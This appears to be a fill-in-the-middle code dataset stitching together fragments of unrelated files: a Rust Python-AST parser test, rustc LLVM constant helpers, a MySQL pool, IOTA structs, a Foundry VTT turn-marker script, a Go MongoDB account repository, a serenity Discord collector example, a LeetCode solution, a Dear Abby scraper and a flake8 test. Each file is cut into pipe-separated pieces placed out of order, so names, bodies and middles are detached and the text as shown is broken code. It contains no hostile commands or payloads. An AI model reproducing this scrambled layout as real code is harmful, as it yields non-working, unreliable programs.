Expression::Num {
n: Number::DecInteger(String::from("5"))
},
Expression::Num {
n: Number::DecInteger(String::from("6"))
},
Expression::Num {
n: Number::DecInteger(String::from("7"))
},
Expression::Name {
id: String::from("a"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("b"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("c"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("d"),
ctx: ExprContext::Load
}
]
}
}
]
};
assert_eq!(ast, expected);
}
| {
let stream = Lexer::new("return p[:,0]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::ExtSlice {
dims: vec![
Slice::Slice {
lower: None,
upper: None,
step: None
},
Slice::Index {
value: Expression::Num {
n: Number::DecInteger(String::from("0"))
}
}
]
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
} |
common.rs | #![allow(non_camel_case_types, non_snake_case)]
//! Code that is useful in various codegen modules.
use crate::consts;
use crate::llvm::{self, BasicBlock, Bool, ConstantInt, False, OperandBundleDef, True};
use crate::type_::Type;
use crate::type_of::LayoutLlvmExt;
use crate::value::Value;
use log::debug;
use rustc::bug;
use rustc_codegen_ssa::traits::*;
use crate::consts::const_alloc_to_llvm;
use rustc::mir::interpret::{Allocation, GlobalAlloc, Scalar};
use rustc::ty::layout::{self, HasDataLayout, LayoutOf, Size, TyLayout};
use rustc_codegen_ssa::mir::place::PlaceRef;
use libc::{c_char, c_uint};
use rustc_ast::ast::Mutability;
use rustc_span::symbol::Symbol;
pub use crate::context::CodegenCx;
/*
* A note on nomenclature of linking: "extern", "foreign", and "upcall".
*
* An "extern" is an LLVM symbol we wind up emitting an undefined external
* reference to. This means "we don't have the thing in this compilation unit,
* please make sure you link it in at runtime". This could be a reference to
* C code found in a C library, or rust code found in a rust crate.
*
* Most "externs" are implicitly declared (automatically) as a result of a
* user declaring an extern _module_ dependency; this causes the rust driver
* to locate an extern crate, scan its compilation metadata, and emit extern
* declarations for any symbols used by the declaring crate.
*
* A "foreign" is an extern that references C (or other non-rust ABI) code.
* There is no metadata to scan for extern references so in these cases either
* a header-digester like bindgen, or manual function prototypes, have to
* serve as declarators. So these are usually given explicitly as prototype
* declarations, in rust code, with ABI attributes on them noting which ABI to
* link via.
*
* An "upcall" is a foreign call generated by the compiler (not corresponding
* to any user-written call in the code) into the runtime library, to perform
* some helper task such as bringing a task to life, allocating memory, etc.
*
*/
/// A structure representing an active landing pad for the duration of a basic
/// block.
///
/// Each `Block` may contain an instance of this, indicating whether the block
/// is part of a landing pad or not. This is used to make decision about whether
/// to emit `invoke` instructions (e.g., in a landing pad we don't continue to
/// use `invoke`) and also about various function call metadata.
///
/// For GNU exceptions (`landingpad` + `resume` instructions) this structure is
/// just a bunch of `None` instances (not too interesting), but for MSVC
/// exceptions (`cleanuppad` + `cleanupret` instructions) this contains data.
/// When inside of a landing pad, each function call in LLVM IR needs to be
/// annotated with which landing pad it's a part of. This is accomplished via
/// the `OperandBundleDef` value created for MSVC landing pads.
pub struct Funclet<'ll> {
cleanuppad: &'ll Value,
operand: OperandBundleDef<'ll>,
}
impl Funclet<'ll> {
pub fn new(cleanuppad: &'ll Value) -> Self {
Funclet { cleanuppad, operand: OperandBundleDef::new("funclet", &[cleanuppad]) }
}
pub fn cleanuppad(&self) -> &'ll Value {
self.cleanuppad
}
pub fn bundle(&self) -> &OperandBundleDef<'ll> {
&self.operand
}
}
impl BackendTypes for CodegenCx<'ll, 'tcx> {
type Value = &'ll Value;
type Function = &'ll Value;
type BasicBlock = &'ll BasicBlock;
type Type = &'ll Type;
type Funclet = Funclet<'ll>;
type DIScope = &'ll llvm::debuginfo::DIScope;
type DIVariable = &'ll llvm::debuginfo::DIVariable;
}
impl CodegenCx<'ll, 'tcx> {
pub fn const_array(&self, ty: &'ll Type, elts: &[&'ll Value]) -> &'ll Value {
unsafe { llvm::LLVMConstArray(ty, elts.as_ptr(), elts.len() as c_uint) }
}
pub fn const_vector(&self, elts: &[&'ll Value]) -> &'ll Value {
unsafe { llvm::LLVMConstVector(elts.as_ptr(), elts.len() as c_uint) }
}
pub fn const_bytes(&self, bytes: &[u8]) -> &'ll Value {
bytes_in_context(self.llcx, bytes)
}
fn const_cstr(&self, s: Symbol, null_terminated: bool) -> &'ll Value {
unsafe {
if let Some(&llval) = self.const_cstr_cache.borrow().get(&s) {
return llval;
}
let s_str = s.as_str();
let sc = llvm::LLVMConstStringInContext(
self.llcx,
s_str.as_ptr() as *const c_char,
s_str.len() as c_uint,
!null_terminated as Bool,
);
let sym = self.generate_local_symbol_name("str");
let g = self.define_global(&sym[..], self.val_ty(sc)).unwrap_or_else(|| {
bug!("symbol `{}` is already defined", sym);
});
llvm::LLVMSetInitializer(g, sc);
llvm::LLVMSetGlobalConstant(g, True);
llvm::LLVMRustSetLinkage(g, llvm::Linkage::InternalLinkage);
self.const_cstr_cache.borrow_mut().insert(s, g);
g
}
}
pub fn const_get_elt(&self, v: &'ll Value, idx: u64) -> &'ll Value {
unsafe {
assert_eq!(idx as c_uint as u64, idx);
let us = &[idx as c_uint];
let r = llvm::LLVMConstExtractValue(v, us.as_ptr(), us.len() as c_uint);
debug!("const_get_elt(v={:?}, idx={}, r={:?})", v, idx, r);
r
}
}
}
impl ConstMethods<'tcx> for CodegenCx<'ll, 'tcx> {
fn const_null(&self, t: &'ll Type) -> &'ll Value {
unsafe { llvm::LLVMConstNull(t) }
}
fn const_undef(&self, t: &'ll Type) -> &'ll Value {
unsafe { llvm::LLVMGetUndef(t) }
}
fn const_int(&self, t: &'ll Type, i: i64) -> &'ll Value {
unsafe { llvm::LLVMConstInt(t, i as u64, True) }
}
fn const_uint(&self, t: &'ll Type, i: u64) -> &'ll Value {
unsafe { llvm::LLVMConstInt(t, i, False) }
}
fn const_uint_big(&self, t: &'ll Type, u: u128) -> &'ll Value {
unsafe {
let words = [u as u64, (u >> 64) as u64];
llvm::LLVMConstIntOfArbitraryPrecision(t, 2, words.as_ptr())
}
}
fn const_bool(&self, val: bool) -> &'ll Value {
self.const_uint(self.type_i1(), val as u64)
}
fn const_i32(&self, i: i32) -> &'ll Value {
self.const_int(self.type_i32(), i as i64)
}
fn const_u32(&self, i: u32) -> &'ll Value {
self.const_uint(self.type_i32(), i as u64)
}
fn const_u64(&self, i: u64) -> &'ll Value {
self.const_uint(self.type_i64(), i)
}
fn const_usize(&self, i: u64) -> &'ll Value {
let bit_size = self.data_layout().pointer_size.bits();
if bit_size < 64 {
// make sure it doesn't overflow
assert!(i < (1 << bit_size));
}
self.const_uint(self.isize_ty, i)
} | self.const_uint(self.type_i8(), i as u64)
}
fn const_real(&self, t: &'ll Type, val: f64) -> &'ll Value {
unsafe { llvm::LLVMConstReal(t, val) }
}
fn const_str(&self, s: Symbol) -> (&'ll Value, &'ll Value) {
let len = s.as_str().len();
let cs = consts::ptrcast(
self.const_cstr(s, false),
self.type_ptr_to(self.layout_of(self.tcx.mk_str()).llvm_type(self)),
);
(cs, self.const_usize(len as u64))
}
fn const_struct(&self, elts: &[&'ll Value], packed: bool) -> &'ll Value {
struct_in_context(self.llcx, elts, packed)
}
fn const_to_opt_uint(&self, v: &'ll Value) -> Option<u64> {
try_as_const_integral(v).map(|v| unsafe { llvm::LLVMConstIntGetZExtValue(v) })
}
fn const_to_opt_u128(&self, v: &'ll Value, sign_ext: bool) -> Option<u128> {
try_as_const_integral(v).and_then(|v| unsafe {
let (mut lo, mut hi) = (0u64, 0u64);
let success = llvm::LLVMRustConstInt128Get(v, sign_ext, &mut hi, &mut lo);
success.then_some(hi_lo_to_u128(lo, hi))
})
}
fn scalar_to_backend(
&self,
cv: Scalar,
layout: &layout::Scalar,
llty: &'ll Type,
) -> &'ll Value {
let bitsize = if layout.is_bool() { 1 } else { layout.value.size(self).bits() };
match cv {
Scalar::Raw { size: 0, .. } => {
assert_eq!(0, layout.value.size(self).bytes());
self.const_undef(self.type_ix(0))
}
Scalar::Raw { data, size } => {
assert_eq!(size as u64, layout.value.size(self).bytes());
let llval = self.const_uint_big(self.type_ix(bitsize), data);
if layout.value == layout::Pointer {
unsafe { llvm::LLVMConstIntToPtr(llval, llty) }
} else {
self.const_bitcast(llval, llty)
}
}
Scalar::Ptr(ptr) => {
let alloc_kind = self.tcx.alloc_map.lock().get(ptr.alloc_id);
let base_addr = match alloc_kind {
Some(GlobalAlloc::Memory(alloc)) => {
let init = const_alloc_to_llvm(self, alloc);
let value = match alloc.mutability {
Mutability::Mut => self.static_addr_of_mut(init, alloc.align, None),
_ => self.static_addr_of(init, alloc.align, None),
};
if !self.sess().fewer_names() {
llvm::set_value_name(value, format!("{:?}", ptr.alloc_id).as_bytes());
}
value
}
Some(GlobalAlloc::Function(fn_instance)) => self.get_fn_addr(fn_instance),
Some(GlobalAlloc::Static(def_id)) => {
assert!(self.tcx.is_static(def_id));
self.get_static(def_id)
}
None => bug!("missing allocation {:?}", ptr.alloc_id),
};
let llval = unsafe {
llvm::LLVMConstInBoundsGEP(
self.const_bitcast(base_addr, self.type_i8p()),
&self.const_usize(ptr.offset.bytes()),
1,
)
};
if layout.value != layout::Pointer {
unsafe { llvm::LLVMConstPtrToInt(llval, llty) }
} else {
self.const_bitcast(llval, llty)
}
}
}
}
fn from_const_alloc(
&self,
layout: TyLayout<'tcx>,
alloc: &Allocation,
offset: Size,
) -> PlaceRef<'tcx, &'ll Value> {
assert_eq!(alloc.align, layout.align.abi);
let llty = self.type_ptr_to(layout.llvm_type(self));
let llval = if layout.size == Size::ZERO {
let llval = self.const_usize(alloc.align.bytes());
unsafe { llvm::LLVMConstIntToPtr(llval, llty) }
} else {
let init = const_alloc_to_llvm(self, alloc);
let base_addr = self.static_addr_of(init, alloc.align, None);
let llval = unsafe {
llvm::LLVMConstInBoundsGEP(
self.const_bitcast(base_addr, self.type_i8p()),
&self.const_usize(offset.bytes()),
1,
)
};
self.const_bitcast(llval, llty)
};
PlaceRef::new_sized(llval, layout)
}
fn const_ptrcast(&self, val: &'ll Value, ty: &'ll Type) -> &'ll Value {
consts::ptrcast(val, ty)
}
}
pub fn val_ty(v: &Value) -> &Type {
unsafe { llvm::LLVMTypeOf(v) }
}
pub fn bytes_in_context(llcx: &'ll llvm::Context, bytes: &[u8]) -> &'ll Value {
unsafe {
let ptr = bytes.as_ptr() as *const c_char;
llvm::LLVMConstStringInContext(llcx, ptr, bytes.len() as c_uint, True)
}
}
pub fn struct_in_context(llcx: &'a llvm::Context, elts: &[&'a Value], packed: bool) -> &'a Value {
unsafe {
llvm::LLVMConstStructInContext(llcx, elts.as_ptr(), elts.len() as c_uint, packed as Bool)
}
}
#[inline]
fn hi_lo_to_u128(lo: u64, hi: u64) -> u128 {
((hi as u128) << 64) | (lo as u128)
}
fn try_as_const_integral(v: &Value) -> Option<&ConstantInt> {
unsafe { llvm::LLVMIsAConstantInt(v) }
} |
fn const_u8(&self, i: u8) -> &'ll Value { |
db.rs | use r2d2;
use r2d2_mysql::mysql::{Opts, OptsBuilder};
use r2d2_mysql::MysqlConnectionManager;
pub type Pool = r2d2::Pool<MysqlConnectionManager>; | let builder = OptsBuilder::from_opts(opts);
let manager = MysqlConnectionManager::new(builder);
r2d2::Pool::new(manager).expect("Failed to create DB Pool")
} |
pub fn get_db_pool() -> Pool {
let db_url = std::env::var("DATABASE_URL").expect("DATABASE_URL must be set");
let opts = Opts::from_url(&db_url).unwrap(); |
structs.rs | // Copyright 2020 IOTA Stiftung
// SPDX-License-Identifier: Apache-2.0
// (Re-)generated by schema tool
// >>>> DO NOT CHANGE THIS FILE! <<<<
// Change the json schema instead
#![allow(dead_code)]
#![allow(unused_imports)]
use wasmlib::*;
#[derive(Clone)]
pub struct Location {
pub x : i32,
pub y : i32,
}
impl Location {
pub fn from_bytes(bytes: &[u8]) -> Location {
let mut dec = WasmDecoder::new(bytes);
Location {
x : int32_decode(&mut dec),
y : int32_decode(&mut dec),
}
}
pub fn to_bytes(&self) -> Vec<u8> {
let mut enc = WasmEncoder::new();
int32_encode(&mut enc, self.x);
int32_encode(&mut enc, self.y);
enc.buf()
}
}
#[derive(Clone)]
pub struct ImmutableLocation {
pub(crate) proxy: Proxy,
}
impl ImmutableLocation {
pub fn exists(&self) -> bool {
self.proxy.exists()
}
pub fn value(&self) -> Location {
Location::from_bytes(&self.proxy.get())
}
}
#[derive(Clone)]
pub struct MutableLocation {
pub(crate) proxy: Proxy,
}
impl MutableLocation {
pub fn delete(&self) {
self.proxy.delete();
}
pub fn | (&self) -> bool {
self.proxy.exists()
}
pub fn set_value(&self, value: &Location) {
self.proxy.set(&value.to_bytes());
}
pub fn value(&self) -> Location {
Location::from_bytes(&self.proxy.get())
}
}
| exists |
turnmarker.js | import { Settings } from './settings.js';
import { Main } from './main.js';
/* issues
- markers don't update for all combats if toekn is in 2 encounters simultaniously
- when animation setting is toggled the non-gm clients dont respect the setting until refresh
-TODO - look into adding tokenMagic FX
*/
CONFIG.debug.hooks = false
let turnmarkerMain;
Hooks.on('init', async () => {
Settings.registerSettings();
game.turnmarker = game.turnmarker || {};
turnmarkerMain = new Main()
turnmarkerMain.init()
game.turnmarker = turnmarkerMain
})
Hooks.on('ready', () => {
turnmarkerMain.praiseTheLordAndPassTheAmmunition()
});
| });
Hooks.on('deleteCombatant', async (combat, combatant, update) => {
let tmarkers = turnmarkerMain.tms.getTurnMarkers(combatant._id)
let smarkers = turnmarkerMain.tms.getStartMarkers(combatant._id)
turnmarkerMain.tms.deleteFromList(tmarkers)
turnmarkerMain.tms.deleteFromList(smarkers)
})
Hooks.on('updateCombatant', async (combat, combatant, update) => {
turnmarkerMain.handleUpdateCombatent(combat, combatant, update)
})
Hooks.on('updateCombat', async (combat, update) => {
turnmarkerMain.processNextTurn(combat, update)
})
Hooks.on('createTile', (scene, tile) => {
turnmarkerMain.startAnimations()
});
Hooks.on('deleteTile', async (scene, tile) => {
turnmarkerMain.deleteLinkedMarkers(tile)
})
Hooks.on('deleteCombat', async (combat) => {
turnmarkerMain.deleteCombatMarkers(combat)
turnmarkerMain.clearTracker(combat)
});
Hooks.on('updateToken', (scene, updateToken, updateData) => {
turnmarkerMain.processInterTurn(updateToken, updateData)
});
Hooks.on('pauseGame', (isPaused) => {
turnmarkerMain.handlePause(isPaused)
}); | Hooks.on('tmSettingsChanged', async (d) => {
turnmarkerMain.applySettings(d) |
account_repository_db.go | package repository
import (
"api-auth/src/entity"
"encoding/json"
"log"
"time"
"github.com/google/uuid"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
)
const (
ACCOUNT = "accounts"
ID = "_id"
PROJECT_ID = "projectId"
USERNAME = "username"
ACTIVED = "activated"
LAST_LOGIN = "lastLogin"
PASSWORD = "password"
CREATED_AT = "createdAt"
CREATED_BY = "createdBy"
UPDATED_AT = "updatedAt"
UPDATED_BY = "updatedBy"
SYSTEM = "SYSTEM"
)
type AccountRepositoryDB struct {
entity.AccountRepository
documentDB DocumentDB
cache Cache
}
type AccountModel struct {
ID primitive.ObjectID `bson:"_id,omitempty" json:"_id"`
ProjectID primitive.ObjectID `bson:"projectId,omitempty"`
UID string `bson:"uid,omitempty"`
FirstName string `bson:"firstName,omitempty"`
LastName string `bson:"lastName,omitempty"`
Email string `bson:"email,omitempty"`
Username string `bson:"username,omitempty"`
Password string `bson:"password,omitempty"`
LastLogin time.Time `bson:"lastLogin,omitempty"`
IsActive bool `bson:"activated"`
VerifiedEmail bool `bson:"verifiedEmail,omitempty"`
ActivedAt time.Time `bson:"activedAt,omitempty"`
createdAt time.Time `bson:"createdAt,omitempty"`
createdBy string `bson:"createdBy,omitempty"`
updatedAt time.Time `bson:"updatedAt,omitempty"`
updatedBy string `bson:"updatedBy,omitempty"`
}
func NewAccountModel() *AccountModel {
return &AccountModel{
ID: primitive.NewObjectID(),
}
}
func NewAccountRepositoryDB(documentDB DocumentDB, cache Cache) *AccountRepositoryDB {
return &AccountRepositoryDB{
documentDB: documentDB,
cache: cache,
}
}
func (repo *AccountRepositoryDB) modelToEntity(model AccountModel) *entity.Account {
account := &entity.Account{
ID: model.ID.Hex(),
ProjectID: model.ProjectID.Hex(),
UID: uuid.MustParse(model.UID),
FirstName: model.FirstName,
LastName: model.LastName,
Email: model.Email,
Username: model.Username,
Password: model.Password,
VerifiedEmail: model.VerifiedEmail,
IsActive: model.IsActive,
ActivedAt: model.ActivedAt,
LastLogin: model.LastLogin,
}
return account
}
func (p *AccountRepositoryDB) entityToModel(account entity.Account) *AccountModel {
projectID, _ := primitive.ObjectIDFromHex(account.ProjectID)
accountID := primitive.NewObjectID()
if account.ID != "" {
accountID, _ = primitive.ObjectIDFromHex(account.ID)
}
model := &AccountModel{
ID: accountID,
ProjectID: projectID,
UID: account.UID.String(),
FirstName: account.FirstName,
LastName: account.LastName,
Email: account.Email,
Username: account.Username,
Password: account.Password,
LastLogin: account.LastLogin,
IsActive: account.IsActive,
VerifiedEmail: account.VerifiedEmail,
ActivedAt: account.ActivedAt,
}
return model
}
func (repo *AccountRepositoryDB) FindByUsernameAndProject(username string, projectID string) (*entity.Account, error) {
log.Println("FindByUsernameAndProject, username: %s, projectID: %s", username, projectID)
var account entity.Account
var model AccountModel
key := projectID + ":" + username
dataString, err := repo.cache.Get(key)
if err != nil || dataString == "" {
oid, _ := primitive.ObjectIDFromHex(projectID)
data, errorDB := repo.documentDB.FindOne(ACCOUNT, bson.D{{PROJECT_ID, oid}, {USERNAME, username}})
if errorDB != nil {
return &account, errorDB
}
dataByte, _ := json.Marshal(data)
repo.cache.Set(key, string(dataByte))
j, _ := json.Marshal(data)
json.Unmarshal(j, &model)
account = *repo.modelToEntity(model)
return &account, nil
}
json.Unmarshal([]byte(dataString), &model)
return repo.modelToEntity(model), nil
}
func (repo *AccountRepositoryDB) FindByID(id string) (*entity.Account, error) {
var account entity.Account
var model AccountModel
dataString, err := repo.cache.Get(id)
if err != nil || dataString == "" |
json.Unmarshal([]byte(dataString), &model)
return repo.modelToEntity(model), nil
}
func (repo *AccountRepositoryDB) Insert(account entity.Account) (string, error) {
acc := repo.entityToModel(account)
acc.createdAt = time.Now()
acc.createdBy = SYSTEM
err := repo.documentDB.InsertOne(ACCOUNT, acc)
if err == nil {
data, _ := json.Marshal(account)
key := account.UID.String()
repo.cache.Set(key, string(data))
}
return acc.ID.Hex(), err
}
func (repo *AccountRepositoryDB) UpdateActived(id string) error {
oid, _ := primitive.ObjectIDFromHex(id)
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{ACTIVED, true}, {UPDATED_AT, time.Now()}, {UPDATED_BY, SYSTEM}}},
})
}
func (repo *AccountRepositoryDB) UpdateLastLogin(id string) error {
oid, _ := primitive.ObjectIDFromHex(id)
now := time.Now()
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{LAST_LOGIN, now}, {UPDATED_AT, now}, {UPDATED_BY, SYSTEM}}},
})
}
func (repo *AccountRepositoryDB) UpdatePassword(id string, password string) error {
oid, _ := primitive.ObjectIDFromHex(id)
now := time.Now()
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{PASSWORD, password}, {UPDATED_AT, now}, {UPDATED_BY, SYSTEM}}},
})
}
| {
oid, err := primitive.ObjectIDFromHex(id)
if err != nil {
return &account, err
}
data, errorDB := repo.documentDB.FindOne(ACCOUNT, bson.D{{ID, oid}})
if errorDB != nil {
return &account, errorDB
}
dataByte, _ := json.Marshal(data)
repo.cache.Set(id, string(dataByte))
j, _ := json.Marshal(data)
json.Unmarshal(j, &model)
return repo.modelToEntity(model), nil
} |
main.rs | //! This example will showcase the beauty of collectors.
//! They allow to await messages or reactions from a user in the middle
//! of a control flow, one being a command.
use std::{collections::HashSet, env, time::Duration};
use serenity::{
async_trait,
collector::{EventCollectorBuilder, MessageCollectorBuilder},
framework::standard::{
help_commands,
macros::{command, group, help},
Args,
CommandGroup,
CommandResult,
HelpOptions,
StandardFramework,
},
// Collectors are streams, that means we can use `StreamExt` and
// `TryStreamExt`.
futures::stream::StreamExt,
http::Http,
model::prelude::*,
prelude::*,
};
#[group("collector")]
#[commands(challenge)]
struct Collector;
#[help]
async fn my_help(
context: &Context,
msg: &Message,
args: Args,
help_options: &'static HelpOptions,
groups: &[&'static CommandGroup],
owners: HashSet<UserId>,
) -> CommandResult {
let _ = help_commands::with_embeds(context, msg, args, help_options, groups, owners).await;
Ok(())
}
struct Handler;
#[async_trait]
impl EventHandler for Handler {
async fn ready(&self, _: Context, ready: Ready) {
println!("{} is connected!", ready.user.name);
}
}
#[tokio::main]
async fn main() {
// Configure the client with your Discord bot token in the environment.
let token = env::var("DISCORD_TOKEN").expect("Expected a token in the environment");
let http = Http::new_with_token(&token);
// We will fetch your bot's id.
let bot_id = match http.get_current_user().await {
Ok(info) => info.id,
Err(why) => panic!("Could not access user info: {:?}", why),
};
| })
.help(&MY_HELP)
.group(&COLLECTOR_GROUP);
let mut client = Client::builder(&token)
.event_handler(Handler)
.framework(framework)
.await
.expect("Err creating client");
if let Err(why) = client.start().await {
println!("Client error: {:?}", why);
}
}
#[command]
async fn challenge(ctx: &Context, msg: &Message, _: Args) -> CommandResult {
let mut score = 0u32;
let _ = msg.reply(ctx, "How was that crusty crab called again? 10 seconds time!").await;
// There are methods implemented for some models to conveniently collect replies.
// This one returns a future that will await a single message only.
// The other method for messages is called `await_replies` and returns a future
// which builds a stream to easily handle them.
if let Some(answer) = &msg.author.await_reply(&ctx).timeout(Duration::from_secs(10)).await {
if answer.content.to_lowercase() == "ferris" {
let _ = answer.reply(ctx, "That's correct!").await;
score += 1;
} else {
let _ = answer.reply(ctx, "Wrong, it's Ferris!").await;
}
} else {
let _ = msg.reply(ctx, "No answer within 10 seconds.").await;
};
let react_msg = msg
.reply(ctx, "React with the reaction representing 1, you got 10 seconds!")
.await
.unwrap();
// The message model has a way to collect reactions on it.
// Other methods are `await_n_reactions` and `await_all_reactions`.
// Same goes for messages!
if let Some(reaction) = &react_msg
.await_reaction(&ctx)
.timeout(Duration::from_secs(10))
.author_id(msg.author.id)
.await
{
// By default, the collector will collect only added reactions.
// We could also pattern-match the reaction in case we want
// to handle added or removed reactions.
// In this case we will just get the inner reaction.
let emoji = &reaction.as_inner_ref().emoji;
let _ = match emoji.as_data().as_str() {
"1️⃣" => {
score += 1;
msg.reply(ctx, "That's correct!").await
},
_ => msg.reply(ctx, "Wrong!").await,
};
} else {
let _ = msg.reply(ctx, "No reaction within 10 seconds.").await;
};
let _ = msg.reply(ctx, "Write 5 messages in 10 seconds").await;
// We can create a collector from scratch too using this builder future.
let collector = MessageCollectorBuilder::new(&ctx)
// Only collect messages by this user.
.author_id(msg.author.id)
.channel_id(msg.channel_id)
.collect_limit(5u32)
.timeout(Duration::from_secs(10))
// Build the collector.
.build();
// Let's acquire borrow HTTP to send a message inside the `async move`.
let http = &ctx.http;
// We want to process each message and get the length.
// There are a couple of ways to do this. Folding the stream with `fold`
// is one way.
// Using `then` to first reply and then create a new stream with all
// messages is another way to do it, which can be nice if you want
// to further process the messages.
// If you don't want to collect the stream, `for_each` may be sufficient.
let collected: Vec<_> = collector
.then(|msg| async move {
let _ = msg.reply(http, format!("I repeat: {}", msg.content)).await;
msg
})
.collect()
.await;
if collected.len() >= 5 {
score += 1;
}
// We can also collect arbitrary events using the generic EventCollector. For example, here we
// collect updates to the messages that the user sent above and check for them updating all 5 of
// them.
let builder = EventCollectorBuilder::new(&ctx)
.add_event_type(EventType::MessageUpdate)
.timeout(Duration::from_secs(20));
// Only collect MessageUpdate events for the 5 MessageIds we're interested in.
let mut collector =
collected.iter().fold(builder, |b, msg| b.add_message_id(msg.id)).build()?;
let _ = msg.reply(ctx, "Edit each of those 5 messages in 20 seconds").await;
let mut edited = HashSet::new();
while let Some(event) = collector.next().await {
match event.as_ref() {
Event::MessageUpdate(e) => {
edited.insert(e.id);
},
e => panic!("Unexpected event type received: {:?}", e.event_type()),
}
if edited.len() >= 5 {
break;
}
}
if edited.len() >= 5 {
score += 1;
let _ = msg.reply(ctx, "Great! You edited 5 out of 5").await;
} else {
let _ = msg.reply(ctx, &format!("You only edited {} out of 5", edited.len())).await;
}
let _ = msg
.reply(ctx, &format!("TIME'S UP! You completed {} out of 4 tasks correctly!", score))
.await;
Ok(())
} | let framework = StandardFramework::new()
.configure(|c| {
c.with_whitespace(true).on_mention(Some(bot_id)).prefix("~").delimiters(vec![", ", ","]) |
s0108_convert_sorted_array_to_binary_search_tree.rs | /**
* [108] Convert Sorted Array to Binary Search Tree
*
* Given an integer array nums where the elements are sorted in ascending order, convert it to a height-balanced binary search tree.
* A height-balanced binary tree is a binary tree in which the depth of the two subtrees of every node never differs by more than one.
*
* Example 1:
* <img alt="" src="https://assets.leetcode.com/uploads/2021/02/18/btree1.jpg" style="width: 302px; height: 222px;" />
* Input: nums = [-10,-3,0,5,9]
* Output: [0,-3,9,-10,null,5]
* Explanation: [0,-10,5,null,-3,null,9] is also accepted:
* <img alt="" src="https://assets.leetcode.com/uploads/2021/02/18/btree2.jpg" style="width: 302px; height: 222px;" />
*
* Example 2:
* <img alt="" src="https://assets.leetcode.com/uploads/2021/02/18/btree.jpg" style="width: 342px; height: 142px;" />
* Input: nums = [1,3]
* Output: [3,1]
* Explanation: [1,3] and [3,1] are both a height-balanced BSTs.
*
*
* Constraints:
*
* 1 <= nums.length <= 10^4
* -10^4 <= nums[i] <= 10^4
* nums is sorted in a strictly increasing order.
*
*/
pub struct | {}
use crate::util::tree::{to_tree, TreeNode};
// problem: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/
// discuss: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/discuss/?currentPage=1&orderBy=most_votes&query=
// submission codes start here
// Definition for a binary tree node.
// #[derive(Debug, PartialEq, Eq)]
// pub struct TreeNode {
// pub val: i32,
// pub left: Option<Rc<RefCell<TreeNode>>>,
// pub right: Option<Rc<RefCell<TreeNode>>>,
// }
//
// impl TreeNode {
// #[inline]
// pub fn new(val: i32) -> Self {
// TreeNode {
// val,
// left: None,
// right: None
// }
// }
// }
use std::cell::RefCell;
use std::rc::Rc;
impl Solution {
pub fn sorted_array_to_bst(nums: Vec<i32>) -> Option<Rc<RefCell<TreeNode>>> {
if nums.is_empty() {
return None;
}
let mid = nums.len() / 2;
let mut result = Some(Rc::new(RefCell::new(TreeNode::new(nums[mid]))));
result.as_mut().unwrap().borrow_mut().left =
Self::sorted_array_to_bst(nums[..mid].to_vec());
result.as_mut().unwrap().borrow_mut().right =
Self::sorted_array_to_bst(nums[mid + 1..].to_vec());
result
}
}
// submission codes end
#[cfg(test)]
mod tests {
use super::*;
#[test]
#[ignore]
fn test_0108_example_1() {
let nums = vec![-10, -3, 0, 5, 9];
let result = tree![0, -3, 9, -10, null, 5];
assert_eq!(Solution::sorted_array_to_bst(nums), result);
}
#[test]
#[ignore]
fn test_0108_example_2() {
let nums = vec![1, 3];
let result = tree![3, 1];
assert_eq!(Solution::sorted_array_to_bst(nums), result);
}
}
| Solution |
textScrape.py | #!/Users/mcmenamin/.virtualenvs/py3env/bin/python
from lxml import html
import requests
from datetime import date
import numpy as np
import pandas as pd
import re as re
from itertools import chain
import pickle
from tqdm import tqdm
def getURLforYear(year, archiveURL='http://www.uexpress.com/dearabby/archives'):
archive = requests.get('{0}/{1}'.format(archiveURL, year))
tree = html.fromstring(archive.text)
urlList = [a.attrib['href'] for a in tree.find_class('media-link-main')]
return urlList
def | (extURL, baseURL='http://www.uexpress.com/'):
page = requests.get('{0}{1}'.format(baseURL, extURL))
tree = html.fromstring(page.text)
questions = tree.find_class('item-section')
allQ = []
for q in questions:
qText = [i.text_content() for i in q.iterfind('p')]
allQ += qText
allQ = ' '.join(allQ)
return allQ
def parseAbby(block):
block = block.strip().split('DEAR ')
abbyBlock = [p.startswith('ABBY:') for p in block]
dearReaderBlock = [p.startswith('READERS:') for p in block]
replyBlock = [not (p[0] or p[1]) for p in zip(abbyBlock, dearReaderBlock)]
QA_pairs = []
if True in abbyBlock and True in replyBlock:
firstBlock = abbyBlock.index(True)
block = block[firstBlock:]
abbyBlock = abbyBlock[firstBlock:]
dearReaderBlock = dearReaderBlock[firstBlock:]
replyBlock = replyBlock[firstBlock:]
for i in range(len(block)-1):
if abbyBlock[i] and replyBlock[i+1]:
QA_pairs.append([block[i], block[i+1]])
return QA_pairs
#
# Get an iterator of URLs from archives for a specific date range
#
archivedURLs = list(chain.from_iterable([getURLforYear(y) for y in range(1991,2017+1)]))
#
# Pull in the text from each archived URL
#
all_text_dict = {}
for url in tqdm(archivedURLs):
raw_text = scrape_page(url)
all_text_dict[url] = {'path': url,
'date': date(*[int(i) for i in url.split('/')[2:5]]),
'raw_text': raw_text,
'parse_text': parseAbby(raw_text)
}
df_text = pd.DataFrame.from_dict(all_text_dict, orient='index')
df_text.to_pickle('abbyText.pickle')
df_text.to_json('abbyText.json',
lines=True,
orient='records',
force_ascii=True
)
| scrape_page |
test_flake8.py | # Copyright 2016-2018 Dirk Thomas
# Licensed under the Apache License, Version 2.0
import logging
from pathlib import Path
import sys
from flake8 import LOG
from flake8.api.legacy import get_style_guide
# avoid debug and info messages from flake8 internals
LOG.setLevel(logging.WARN)
def test_flake8():
| style_guide = get_style_guide(
ignore=['D100', 'D104'],
show_source=True,
)
style_guide_tests = get_style_guide(
ignore=['D100', 'D101', 'D102', 'D103', 'D104', 'D105', 'D107'],
show_source=True,
)
stdout = sys.stdout
sys.stdout = sys.stderr
